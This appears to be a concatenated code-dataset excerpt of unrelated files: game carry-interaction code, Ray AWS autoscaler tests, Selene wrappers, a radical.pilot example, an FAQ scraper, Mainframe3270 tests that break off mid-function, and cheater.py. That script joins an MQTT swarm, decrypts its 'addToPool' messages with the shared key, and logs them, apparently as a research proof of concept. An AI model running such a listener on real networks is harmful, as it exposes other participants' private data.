tunable_type=ParticipantType,
default=ParticipantType.CarriedObject),
'sim_participant_type':TunableEnumEntry(description='\n The Sim that will get a new carry.\n ',
tunable_type=ParticipantTypeSingleSim,
default=ParticipantTypeSingleSim.Actor),
'target':TunableVariant(description='\n Specify what to use as the target of\n the owning affordance.\n ',
object_to_be_carried=TunableTuple(description='\n Target is the object that WILL be carried.\n ',
locked_args={'target_type': OBJECT_TO_BE_CARRIED}),
none=TunableTuple(description='\n Target is None\n ',
locked_args={'target_type': NONE}),
participant_type=TunableTuple(description='\n Target is the specified participant of THIS interaction.\n \n This is necessary if we need to target another participant\n when we push the owning affordance\n ',
participant=TunableEnumEntry(tunable_type=ParticipantType,
default=(ParticipantType.CarriedObject)),
locked_args={'target_type': PARTICIPANT_TYPE}),
default='object_to_be_carried'),
'owning_affordance':TunablePackSafeReference(description='\n The interaction that will be pushed that will own the carry\n state (e.g. a put down).\n ',
manager=services.get_instance_manager(sims4.resources.Types.INTERACTION),
allow_none=True),
'carry_track_override':TunableVariant(description='\n Specify the carry track, instead of using the carry of the SI.\n ',
explicit=TrackOverrideExplicit.TunableFactory(),
handedness=TrackOverrideHandedness.TunableFactory(),
default='disabled',
locked_args={'disabled': None})}
def __init__(self, interaction, *args, sequence=(), **kwargs):
(super().__init__)(*args, **kwargs)
self.interaction = interaction
self.sequence = sequence
def _run(self, timeline):
carry_track_override = self.carry_track_override.get_override(self.interaction, self.sim_participant_type) if self.carry_track_override is not None else None
target = self.target
if target.target_type == EnterCarryWhileHolding.NONE:
target_participant_type = None
else:
if target.target_type == EnterCarryWhileHolding.OBJECT_TO_BE_CARRIED:
target_participant_type = self.carry_obj_participant_type
else:
if target.target_type == EnterCarryWhileHolding.PARTICIPANT_TYPE:
target_participant_type = target.participant
carry_element = enter_carry_while_holding((self.interaction), sequence=(self.sequence),
carry_obj_participant_type=(self.carry_obj_participant_type),
sim_participant_type=(self.sim_participant_type),
target_participant_type=target_participant_type,
owning_affordance=(self.owning_affordance),
carry_track_override=carry_track_override)
return timeline.run_child(carry_element)
class TunableExitCarryWhileHolding(TunableFactory):
FACTORY_TYPE = staticmethod(exit_carry_while_holding)
def __init__(self, *args, description='Exit the carry for the target or carry_target of an interaction. The animations played during the interaction should exit the carry via an XEVT.', **kwargs):
(super().__init__)(args, description=description, sim_participant_type=TunableEnumEntry(description='\n The Sim that will exit a carry.\n ',
tunable_type=ParticipantType,
default=(ParticipantType.Actor)), **kwargs)
class TransferCarryWhileHolding(elements.ParentElement, HasTunableFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'enter_carry_while_holding':EnterCarryWhileHolding.TunableFactory(),
'exit_carry_while_holding':TunableExitCarryWhileHolding()}
def __init__(self, interaction, *args, sequence=(), **kwargs):
(super().__init__)(*args, **kwargs)
self.interaction = interaction
self.sequence = sequence
def _run(self, timeline):
obj = self.interaction.get_participant(self.enter_carry_while_holding.carry_obj_participant_type)
source_sim = self.interaction.get_participant(self.exit_carry_while_holding.sim_participant_type)
target_sim = self.interaction.get_participant(self.enter_carry_while_holding.sim_participant_type)
def _add_reservation_clobberer(_):
obj.add_reservation_clobberer(source_sim, target_sim)
def _remove_reservation_clobberer(_):
obj.remove_reservation_clobberer(source_sim, target_sim)
sequence = self.enter_carry_while_holding((self.interaction), sequence=(self.sequence))
sequence = self.exit_carry_while_holding((self.interaction), sequence=sequence)
sequence = element_utils.build_critical_section_with_finally(_add_reservation_clobberer, sequence, _remove_reservation_clobberer)
return timeline.run_child(sequence) | 57.197368 | 355 | 0.673995 |
acf6c2d628c2eb813a2f4e4f83b0734208ff9b63 | 7,157 | py | Python | python/ray/tests/aws/test_autoscaler_aws.py | Crissman/ray | 2092b097eab41b118a117fdfadd0fe664db41f63 | [
"Apache-2.0"
] | 3 | 2021-06-22T19:57:41.000Z | 2021-06-23T07:16:44.000Z | python/ray/tests/aws/test_autoscaler_aws.py | h453693821/ray | 9eb79727aa6ad94b01f8b660b83e1182555a89f6 | [
"Apache-2.0"
] | 72 | 2021-02-06T08:07:16.000Z | 2022-03-26T07:17:49.000Z | python/ray/tests/aws/test_autoscaler_aws.py | h453693821/ray | 9eb79727aa6ad94b01f8b660b83e1182555a89f6 | [
"Apache-2.0"
] | 2 | 2021-05-05T21:05:16.000Z | 2021-06-22T21:16:03.000Z | import pytest
from ray.autoscaler._private.aws.config import _get_vpc_id_or_die, \
bootstrap_aws, \
DEFAULT_AMI
import ray.tests.aws.utils.stubs as stubs
import ray.tests.aws.utils.helpers as helpers
from ray.tests.aws.utils.constants import AUX_SUBNET, DEFAULT_SUBNET, \
DEFAULT_SG_AUX_SUBNET, DEFAULT_SG, DEFAULT_SG_DUAL_GROUP_RULES, \
DEFAULT_SG_WITH_RULES_AUX_SUBNET, AUX_SG, \
DEFAULT_SG_WITH_NAME, DEFAULT_SG_WITH_NAME_AND_RULES, CUSTOM_IN_BOUND_RULES
def test_create_sg_different_vpc_same_rules(iam_client_stub, ec2_client_stub):
# use default stubs to skip ahead to security group configuration
stubs.skip_to_configure_sg(ec2_client_stub, iam_client_stub)
# given head and worker nodes with custom subnets defined...
# expect to first describe the worker subnet ID
stubs.describe_subnets_echo(ec2_client_stub, AUX_SUBNET)
# expect to second describe the head subnet ID
stubs.describe_subnets_echo(ec2_client_stub, DEFAULT_SUBNET)
# given no existing security groups within the VPC...
stubs.describe_no_security_groups(ec2_client_stub)
# expect to first create a security group on the worker node VPC
stubs.create_sg_echo(ec2_client_stub, DEFAULT_SG_AUX_SUBNET)
# expect new worker security group details to be retrieved after creation
stubs.describe_sgs_on_vpc(
ec2_client_stub,
[AUX_SUBNET["VpcId"]],
[DEFAULT_SG_AUX_SUBNET],
)
# expect to second create a security group on the head node VPC
stubs.create_sg_echo(ec2_client_stub, DEFAULT_SG)
# expect new head security group details to be retrieved after creation
stubs.describe_sgs_on_vpc(
ec2_client_stub,
[DEFAULT_SUBNET["VpcId"]],
[DEFAULT_SG],
)
# given no existing default head security group inbound rules...
# expect to authorize all default head inbound rules
stubs.authorize_sg_ingress(
ec2_client_stub,
DEFAULT_SG_DUAL_GROUP_RULES,
)
# given no existing default worker security group inbound rules...
# expect to authorize all default worker inbound rules
stubs.authorize_sg_ingress(
ec2_client_stub,
DEFAULT_SG_WITH_RULES_AUX_SUBNET,
)
# given our mocks and an example config file as input...
# expect the config to be loaded, validated, and bootstrapped successfully
config = helpers.bootstrap_aws_example_config_file("example-subnets.yaml")
# expect the bootstrapped config to show different head and worker security
# groups residing on different subnets
assert config["head_node"]["SecurityGroupIds"] == [DEFAULT_SG["GroupId"]]
assert config["head_node"]["SubnetIds"] == [DEFAULT_SUBNET["SubnetId"]]
assert config["worker_nodes"]["SecurityGroupIds"] == [AUX_SG["GroupId"]]
assert config["worker_nodes"]["SubnetIds"] == [AUX_SUBNET["SubnetId"]]
# expect no pending responses left in IAM or EC2 client stub queues
iam_client_stub.assert_no_pending_responses()
ec2_client_stub.assert_no_pending_responses()
def test_create_sg_with_custom_inbound_rules_and_name(iam_client_stub,
ec2_client_stub):
# use default stubs to skip ahead to security group configuration
stubs.skip_to_configure_sg(ec2_client_stub, iam_client_stub)
# expect to describe the head subnet ID
stubs.describe_subnets_echo(ec2_client_stub, DEFAULT_SUBNET)
# given no existing security groups within the VPC...
stubs.describe_no_security_groups(ec2_client_stub)
# expect to create a security group on the head node VPC
stubs.create_sg_echo(ec2_client_stub, DEFAULT_SG_WITH_NAME)
# expect new head security group details to be retrieved after creation
stubs.describe_sgs_on_vpc(
ec2_client_stub,
[DEFAULT_SUBNET["VpcId"]],
[DEFAULT_SG_WITH_NAME],
)
# given custom existing default head security group inbound rules...
# expect to authorize both default and custom inbound rules
stubs.authorize_sg_ingress(
ec2_client_stub,
DEFAULT_SG_WITH_NAME_AND_RULES,
)
# given the prior modification to the head security group...
# expect the next read of a head security group property to reload it
stubs.describe_sg_echo(ec2_client_stub, DEFAULT_SG_WITH_NAME_AND_RULES)
_get_vpc_id_or_die.cache_clear()
# given our mocks and an example config file as input...
# expect the config to be loaded, validated, and bootstrapped successfully
config = helpers.bootstrap_aws_example_config_file(
"example-security-group.yaml")
# expect the bootstrapped config to have the custom security group...
# name and in bound rules
assert config["provider"]["security_group"][
"GroupName"] == DEFAULT_SG_WITH_NAME_AND_RULES["GroupName"]
assert config["provider"]["security_group"][
"IpPermissions"] == CUSTOM_IN_BOUND_RULES
# expect no pending responses left in IAM or EC2 client stub queues
iam_client_stub.assert_no_pending_responses()
ec2_client_stub.assert_no_pending_responses()
def test_subnet_given_head_and_worker_sg(iam_client_stub, ec2_client_stub):
stubs.configure_iam_role_default(iam_client_stub)
stubs.configure_key_pair_default(ec2_client_stub)
# list a security group and a thousand subnets in different vpcs
stubs.describe_a_security_group(ec2_client_stub, DEFAULT_SG)
stubs.describe_a_thousand_subnets_in_different_vpcs(ec2_client_stub)
config = helpers.bootstrap_aws_example_config_file(
"example-head-and-worker-security-group.yaml")
# check that just the single subnet in the right vpc is filled
assert config["head_node"]["SubnetIds"] == [DEFAULT_SUBNET["SubnetId"]]
assert config["worker_nodes"]["SubnetIds"] == [DEFAULT_SUBNET["SubnetId"]]
# expect no pending responses left in IAM or EC2 client stub queues
iam_client_stub.assert_no_pending_responses()
ec2_client_stub.assert_no_pending_responses()
def test_fills_out_amis(iam_client_stub, ec2_client_stub):
# Setup stubs to mock out boto3
stubs.configure_iam_role_default(iam_client_stub)
stubs.configure_key_pair_default(ec2_client_stub)
stubs.describe_a_security_group(ec2_client_stub, DEFAULT_SG)
stubs.configure_subnet_default(ec2_client_stub)
config = helpers.load_aws_example_config_file("example-full.yaml")
del config["head_node"]["ImageId"]
del config["worker_nodes"]["ImageId"]
# Pass in SG for stub to work
config["head_node"]["SecurityGroupIds"] = ["sg-1234abcd"]
config["worker_nodes"]["SecurityGroupIds"] = ["sg-1234abcd"]
defaults_filled = bootstrap_aws(config)
ami = DEFAULT_AMI.get(config.get("provider", {}).get("region"))
assert defaults_filled["head_node"].get("ImageId") == ami
assert defaults_filled["worker_nodes"].get("ImageId") == ami
iam_client_stub.assert_no_pending_responses()
ec2_client_stub.assert_no_pending_responses()
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
| 42.60119 | 79 | 0.739695 |
acf6c37587ca91c5bec4001860a9c4c30856b279 | 6,575 | py | Python | selene/browser.py | kianku/selene | 5361938e4f34d6cfae6df3aeca80e06a3e657d8c | [
"MIT"
] | null | null | null | selene/browser.py | kianku/selene | 5361938e4f34d6cfae6df3aeca80e06a3e657d8c | [
"MIT"
] | null | null | null | selene/browser.py | kianku/selene | 5361938e4f34d6cfae6df3aeca80e06a3e657d8c | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2015-2020 Iakiv Kramarenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import warnings
from typing import Union
from selenium.webdriver.remote.webdriver import WebDriver
from selene.core.entity import Collection, Element
from selene.core.configuration import Config
from selene.support.shared import browser
# todo: just remove this file, once deprecation is totally applied
def driver() -> WebDriver:
warnings.warn('selene.browser.driver is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.config.driver
def quit():
warnings.warn('selene.browser.quit is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
browser.quit()
def quit_driver():
warnings.warn('selene.browser.quit_driver is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
browser.quit()
def close():
warnings.warn('selene.browser.close is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
browser.close_current_tab()
def set_driver(webdriver: WebDriver):
warnings.warn('selene.browser.set_driver is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
# noinspection PyDataclass
browser.config.driver = webdriver # todo: test it
def open(absolute_or_relative_url):
warnings.warn('selene.browser.open is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.open(absolute_or_relative_url)
def open_url(absolute_or_relative_url):
warnings.warn('selene.browser.open_url is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.open(absolute_or_relative_url)
def element(css_or_xpath_or_by: Union[str, tuple]) -> Element:
warnings.warn('selene.browser.element is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.element(css_or_xpath_or_by)
def elements(css_or_xpath_or_by: Union[str, tuple]) -> Collection:
warnings.warn('selene.browser.elements is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.all(css_or_xpath_or_by)
def all(css_or_xpath_or_by: Union[str, tuple]) -> Collection:
warnings.warn('selene.browser.all is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.all(css_or_xpath_or_by)
def take_screenshot(path=None, filename=None):
warnings.warn('selene.browser.take_screenshot is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.take_screenshot(path, filename)
def save_screenshot(file):
warnings.warn('selene.browser.save_screenshot is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.save_screenshot(file)
def save_page_source(file):
warnings.warn('selene.browser.save_page_source is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.save_page_source(file)
def latest_screenshot():
warnings.warn('selene.browser.latest_screenshot is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser._latest_screenshot
def latest_page_source():
warnings.warn('selene.browser.latest_page_source is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser._latest_page_source
def wait_to(webdriver_condition, timeout=None, polling=None):
warnings.warn('selene.browser.wait_to is deprecated, '
'use `from selene.support.shared import browser` import, '
'and also use browser.should style',
DeprecationWarning)
tuned_browser = browser if timeout is None else browser.with_(Config(timeout=timeout))
return tuned_browser.should(webdriver_condition)
def should(webdriver_condition, timeout=None, polling=None):
warnings.warn('selene.browser.should is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
tuned_browser = browser if timeout is None else browser.with_(Config(timeout=timeout))
return tuned_browser.should(webdriver_condition)
def execute_script(script, *args):
warnings.warn('selene.browser.execute_script is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.driver.execute_script(script, *args)
def title():
warnings.warn('selene.browser.title is deprecated, '
'use `from selene.support.shared import browser` import',
DeprecationWarning)
return browser.driver.title
| 37.571429 | 90 | 0.696122 |
acf6c3fefcdde7a4c3ce8d65bc92cd25646cd54c | 4,770 | py | Python | examples/probing.py | karahbit/radical.pilot | c611e1df781749deef899dcf5815728e1d8a962e | [
"MIT"
] | null | null | null | examples/probing.py | karahbit/radical.pilot | c611e1df781749deef899dcf5815728e1d8a962e | [
"MIT"
] | null | null | null | examples/probing.py | karahbit/radical.pilot | c611e1df781749deef899dcf5815728e1d8a962e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
__copyright__ = 'Copyright 2013-2014, http://radical.rutgers.edu'
__license__ = 'MIT'
import os
import sys
import radical.pilot as rp
import radical.utils as ru
dh = ru.DebugHelper()
# ------------------------------------------------------------------------------
#
# READ the RADICAL-Pilot documentation: https://radicalpilot.readthedocs.io/
#
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
#
if __name__ == '__main__':
# we use a reporter class for nicer output
report = ru.Reporter(name='radical.pilot')
report.title('Getting Started (RP version %s)' % rp.version)
# use the resource specified as argument, fall back to localhost
if len(sys.argv) > 3: report.exit('Usage:\t%s [resource]\n\n' % sys.argv[0])
elif len(sys.argv) == 2: resource = sys.argv[1]
else : resource = 'local.localhost'
# Create a new session. No need to try/except this: if session creation
# fails, there is not much we can do anyways...
session = rp.Session()
# all other pilot code is now tried/excepted. If an exception is caught, we
# can rely on the session object to exist and be valid, and we can thus tear
# the whole RP stack down via a 'session.close()' call in the 'finally'
# clause...
try:
# read the config used for resource details
report.info('read config')
config = ru.read_json('%s/config.json' % os.path.dirname(__file__))
report.ok('>>ok\n')
report.header('submit pilots')
# Add a Pilot Manager. Pilot managers manage one or more ComputePilots.
pmgr = rp.PilotManager(session=session)
# Define an [n]-core local pilot that runs for [x] minutes
# Here we use a dict to initialize the description object
pd_init = {'resource' : resource,
'runtime' : 15, # pilot runtime (min)
'exit_on_error' : True,
'project' : config[resource]['project'],
'queue' : config[resource]['queue'],
'access_schema' : config[resource]['schema'],
'cores' : config[resource]['cores']
}
pdesc = rp.ComputePilotDescription(pd_init)
# Launch the pilot.
pilot = pmgr.submit_pilots(pdesc)
report.header('submit units')
# Register the ComputePilot in a UnitManager object.
umgr = rp.UnitManager(session=session)
umgr.add_pilots(pilot)
# Create a workload of ComputeUnits.
# Each compute unit runs '/bin/date'.
n = 10 # number of units to run
report.info('create %d unit description(s)\n\t' % n)
cuds = list()
for i in range(0, n):
# create a new CU description, and fill it.
# Here we don't use dict initialization.
cud = rp.ComputeUnitDescription()
cud.executable = 'df'
cud.argument = ['/tmp/','>','$hostname.txt']
cud.gpu_processes = 0
cud.cpu_processes = 1
cud.cpu_threads = sys.argv[2]
# to ensure each CU lands on own node
# cud.cpu_process_type = rp.MPI
# cud.cpu_thread_type = rp.OpenMP
cuds.append(cud)
report.progress()
report.ok('>>ok\n')
# Submit the previously created ComputeUnit descriptions to the
# PilotManager. This will trigger the selected scheduler to start
# assigning ComputeUnits to the ComputePilots.
umgr.submit_units(cuds)
# Wait for all compute units to reach a final state (DONE, CANCELED or FAILED).
report.header('gather results')
umgr.wait_units()
except Exception as e:
# Something unexpected happened in the pilot code above
report.error('caught Exception: %s\n' % e)
ru.print_exception_trace()
raise
except (KeyboardInterrupt, SystemExit):
# the callback called sys.exit(), and we can here catch the
# corresponding KeyboardInterrupt exception for shutdown. We also catch
# SystemExit (which gets raised if the main threads exits for some other
# reason).
ru.print_exception_trace()
report.warn('exit requested\n')
finally:
# always clean up the session, no matter if we caught an exception or
# not. This will kill all remaining pilots.
report.header('finalize')
session.close(download=True)
report.header()
# ------------------------------------------------------------------------------
| 35.864662 | 87 | 0.563103 |
acf6c424f73d8811e3fc433cd50fe22eb0cac933 | 136 | py | Python | code/check_tf.py | getnexar/VPE | b600a0a9ef0579325fb58f07ddb13d1733dbe459 | [
"MIT"
] | null | null | null | code/check_tf.py | getnexar/VPE | b600a0a9ef0579325fb58f07ddb13d1733dbe459 | [
"MIT"
] | null | null | null | code/check_tf.py | getnexar/VPE | b600a0a9ef0579325fb58f07ddb13d1733dbe459 | [
"MIT"
] | 1 | 2020-06-22T18:37:22.000Z | 2020-06-22T18:37:22.000Z | import tensorflow as tf
import torch
pip install torch===1.5.0 torchvision===0.6.0 -f https://download.pytorch.org/whl/torch_stable.html | 45.333333 | 99 | 0.779412 |
acf6c4fdd83b10f9e9ab97856cc4fecb07605c84 | 1,567 | py | Python | src/data/gst_scrapper.py | souvik-mishra/FAQChatbot | f1859103e9d347b6e40bebee7d6d268f8a5b1afd | [
"MIT"
] | 28 | 2019-05-27T03:06:30.000Z | 2022-03-31T21:55:50.000Z | src/data/gst_scrapper.py | yogeshhk/faqbotplatform | f1859103e9d347b6e40bebee7d6d268f8a5b1afd | [
"MIT"
] | 3 | 2020-03-30T07:48:25.000Z | 2021-04-22T02:02:46.000Z | src/data/gst_scrapper.py | souvik-mishra/FAQChatbot | f1859103e9d347b6e40bebee7d6d268f8a5b1afd | [
"MIT"
] | 17 | 2019-06-15T08:12:19.000Z | 2022-03-24T04:13:12.000Z | # -*- coding: utf-8 -*-
# Ref: http://srome.github.io/Parsing-HTML-Tables-in-Python-with-BeautifulSoup-and-pandas/
import requests
import pandas as pd
from bs4 import BeautifulSoup
class HTMLTableParser:
def parse_url(self, url):
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
return [self.parse_html_table(table) for table in soup.find_all('table') if table.has_attr('id')]
def parse_html_table(self, table):
n_columns = 3 # hardcoded
rows = table.find_all('tr')
n_rows= len(rows)
header_row = rows[0]
column_names = [col.get_text() for col in header_row.find_all('td')]
df = pd.DataFrame(columns = column_names,index= range(0,n_rows))
for i in range(1,n_rows):
row_values = [col.get_text() for col in rows[i].find_all('td')]
if len(row_values) <3:
continue
question_text = row_values[1]
answer_text = row_values[2]
answer_text = answer_text.splitlines()[0]
if len(answer_text) > 10:
answer_text = answer_text.split(' ', 1)[1]
df.iloc[i-1,0] = question_text
df.iloc[i-1,1] = answer_text
return df
if __name__ == "__main__":
hp = HTMLTableParser()
url = "https://cbec-gst.gov.in/faq.html"
tables = hp.parse_url(url)
total_df = pd.concat(tables, axis=0)
total_df.to_csv("scrapedfaq.csv",index=False)
| 33.340426 | 107 | 0.579451 |
acf6c5b13015c957c7b01454f637f18a505143fc | 1,668 | py | Python | cheater.py | alexismarquet/MSE-TM-PoC | a104fc54c3064ed33399010fdff81e0f158ad9f8 | [
"MIT"
] | null | null | null | cheater.py | alexismarquet/MSE-TM-PoC | a104fc54c3064ed33399010fdff81e0f158ad9f8 | [
"MIT"
] | null | null | null | cheater.py | alexismarquet/MSE-TM-PoC | a104fc54c3064ed33399010fdff81e0f158ad9f8 | [
"MIT"
] | null | null | null | import paho.mqtt.client as mqtt
import time
import argparse
from tinydb import TinyDB, Query
from Crypto.Cipher import AES
from measure import Measure
import logging
import sys
# Command-line interface: broker address plus the swarm's shared AES key.
# NOTE(review): the description string is argparse-tutorial boilerplate
# ("Process some integers.") -- it should probably describe this tool.
parser = argparse.ArgumentParser(description="Process some integers.")
parser.add_argument(
    "MQTT_broker", metavar="MQTT_broker", type=str, help="Address of the MQTT broker"
)
parser.add_argument("SF_key", metavar="Sf", type=str, help="Swarm shared secret")
args = parser.parse_args()
# Logging goes both to log/cheater.log and to stdout.
logFormatter = logging.Formatter(
    "%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s"
)
logger = logging.getLogger()
fileHandler = logging.FileHandler("{0}/{1}.log".format("log", f"cheater"))
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler)
logger.setLevel(logging.DEBUG)
# AES in ECB mode keyed with the swarm shared secret; used to decrypt
# ciphertext published on the broker.
decipher = AES.new(args.SF_key, AES.MODE_ECB)
# MQTT message callback.
def on_message(client, userdata, message):
    """Log every received message; decrypt and log Measures from 'addToPool'.

    Payloads on 'addToPool' are hex-encoded AES-ECB ciphertext of a packed
    Measure (see measure.py) -- decoded here with the module-level `decipher`.
    """
    logger.debug("rcvd: " + message.topic + "/" + str(message.payload.decode("utf-8")))
    if message.topic == "addToPool":
        # hex string -> raw ciphertext bytes -> plaintext struct bytes
        as_bytes = bytes.fromhex(message.payload.decode("utf-8"))
        res = decipher.decrypt(as_bytes)
        m = Measure("none")
        m.unpack(res)
        logger.info(m)
logger.info(f"Connecting to broker at {args.MQTT_broker}")
client = mqtt.Client("Cheater")
client.connect(args.MQTT_broker)
client.loop_start()
client.subscribe("addToPool")
client.on_message = on_message
while True:
time.sleep(1)
client.loop_stop()
| 26.47619 | 87 | 0.733813 |
acf6c6f37de0e8d7494fc964d4da9b85b6567be4 | 5,074 | py | Python | utest/py3270/test_emulator.py | MichaelSeeburger/Robot-Framework-Mainframe-3270-Library | 76b589d58c55a39f96c027a8ae28c41fa37ed445 | [
"MIT"
] | 3 | 2018-10-02T14:32:06.000Z | 2018-10-02T14:33:32.000Z | utest/py3270/test_emulator.py | MichaelSeeburger/Robot-Framework-Mainframe-3270-Library | 76b589d58c55a39f96c027a8ae28c41fa37ed445 | [
"MIT"
] | null | null | null | utest/py3270/test_emulator.py | MichaelSeeburger/Robot-Framework-Mainframe-3270-Library | 76b589d58c55a39f96c027a8ae28c41fa37ed445 | [
"MIT"
] | null | null | null | import errno
import os
import pytest
from Mainframe3270.py3270 import Emulator, TerminatedError
# Absolute directory of this test module, used to build resource-file paths.
CURDIR = os.path.dirname(os.path.realpath(__file__))
@pytest.fixture
def mock_windows(mocker):
    # Pretend we are on Windows so Emulator selects the ws3270/wc3270 binaries.
    mocker.patch("Mainframe3270.py3270.os_name", "nt")
@pytest.fixture
def mock_posix(mocker):
    # Pretend we are on a POSIX OS, and stub process creation so no real
    # s3270/x3270 binary is ever spawned.
    mocker.patch("Mainframe3270.py3270.os_name", "posix")
    mocker.patch("subprocess.Popen")
def test_emulator_default_args(mock_windows):
    """On Windows, a default Emulator uses the headless ws3270 executable."""
    emulator = Emulator()
    app = emulator.app
    assert app.executable == "ws3270"
    assert app.args == ["-xrm", "ws3270.unlockDelay: False"]
def test_emulator_visible(mock_windows):
    """On Windows, visible=True selects wc3270 with its default model args."""
    emulator = Emulator(visible=True)
    expected_args = [
        "-xrm",
        "wc3270.unlockDelay: False",
        "-xrm",
        "wc3270.model: 2",
    ]
    assert emulator.app.executable == "wc3270"
    assert emulator.app.args == expected_args
def test_emulator_none_windows(mock_posix):
    """On POSIX, a default Emulator uses the headless s3270 executable."""
    assert Emulator().app.executable == "s3270"
def test_emulator_none_windows_visible(mock_posix):
    """On POSIX, visible=True selects the x3270 executable."""
    assert Emulator(visible=True).app.executable == "x3270"
def test_emulator_with_extra_args_oneline(mock_windows):
    """Args read from a one-line argfile are appended to the default args."""
    argfile = os.path.join(CURDIR, "resources/argfile_oneline.txt")
    emulator = Emulator(extra_args=argfile)
    expected = ["--charset", "german"]
    for arg in expected:
        assert arg in emulator.app.args
    assert emulator.app.args > expected
def test_emulator_none_windows_extra_args_oneline(mock_posix):
    """On POSIX, args from a one-line argfile are appended to the defaults."""
    argfile = os.path.join(CURDIR, "resources/argfile_oneline.txt")
    emulator = Emulator(extra_args=argfile)
    expected = ["--charset", "german"]
    for arg in expected:
        assert arg in emulator.app.args
    assert emulator.app.args > expected
def test_emulator_with_extra_args_multiline(mock_windows):
    """Args spread over multiple argfile lines are all picked up."""
    argfile = os.path.join(CURDIR, "resources/argfile_multiline.txt")
    emulator = Emulator(extra_args=argfile)
    expected = ["--charset", "bracket", "--accepthostname", "myhost.com"]
    for arg in expected:
        assert arg in emulator.app.args
    assert emulator.app.args > expected
def test_emulator_with_extra_args_multiline_comments(mock_windows):
    """Comment lines in the argfile are ignored while real args are kept."""
    argfile = os.path.join(CURDIR, "resources/argfile_multiline_comments.txt")
    emulator = Emulator(extra_args=argfile)
    expected = ["--charset", "bracket", "--accepthostname", "myhost.com"]
    for arg in expected:
        assert arg in emulator.app.args
    assert "comment" not in emulator.app.args
def test_emulator_with_extra_args(mock_windows):
    """Extra args passed as a list are appended to the default args."""
    passed_args = ["--cadir", "/path/to/ca_dir"]
    emulator = Emulator(extra_args=passed_args)
    for arg in passed_args:
        assert arg in emulator.app.args
    assert emulator.app.args > passed_args
def test_exec_command_when_is_terminated(mock_windows, mocker):
    # exec_command on an already-terminated emulator must refuse to run
    # and raise with the documented message.
    under_test = Emulator()
    under_test.is_terminated = True
    with pytest.raises(
        TerminatedError, match="This Emulator instance has been terminated"
    ):
        under_test.exec_command(b"abc")
def test_terminate_BrokenPipeError(mock_windows, mocker):
    # A BrokenPipeError raised while sending the quit command is swallowed
    # and the emulator is still marked terminated.
    mocker.patch("Mainframe3270.py3270.ExecutableAppWin.close")
    mocker.patch(
        "Mainframe3270.py3270.Emulator.exec_command", side_effect=BrokenPipeError
    )
    under_test = Emulator()
    under_test.terminate()
    assert under_test.is_terminated
def test_terminate_socket_error(mock_windows, mocker):
    """terminate() swallows an ECONNRESET OSError and marks the emulator terminated."""
    mock_os_error = OSError()
    mock_os_error.errno = errno.ECONNRESET
    mocker.patch("Mainframe3270.py3270.ExecutableAppWin.close")
    mocker.patch(
        "Mainframe3270.py3270.Emulator.exec_command", side_effect=mock_os_error
    )
    under_test = Emulator()
    under_test.terminate()
    # Bug fix: this previously ASSIGNED `under_test.is_terminated = True`,
    # verifying nothing; mirror test_terminate_BrokenPipeError and assert it.
    assert under_test.is_terminated
def test_terminate_other_socket_error(mock_windows, mocker):
    # OSErrors other than ECONNRESET must propagate out of terminate().
    mocker.patch("Mainframe3270.py3270.ExecutableAppWin.close")
    mocker.patch("Mainframe3270.py3270.Emulator.exec_command", side_effect=OSError)
    under_test = Emulator()
    with pytest.raises(OSError):
        under_test.terminate()
def test_is_connected(mock_windows, mocker):
    # Feed readline a canned x3270 status response; the connection-state
    # field "C(pub400.com)" means connected, so is_connected() is truthy.
    mocker.patch("Mainframe3270.py3270.ExecutableAppWin.write")
    mocker.patch(
        "Mainframe3270.py3270.ExecutableAppWin.readline",
        side_effect=[
            b"data: abc",
            b"U U U C(pub400.com) C 4 43 80 4 24 0x0 0.000",
            b"ok",
        ],
    )
    under_test = Emulator()
    assert under_test.is_connected()
def test_is_not_connected(mock_windows, mocker):
    # Same canned status exchange, but the connection-state field is "N"
    # (not connected), so is_connected() must be falsy.
    mocker.patch("Mainframe3270.py3270.ExecutableAppWin.write")
    mocker.patch(
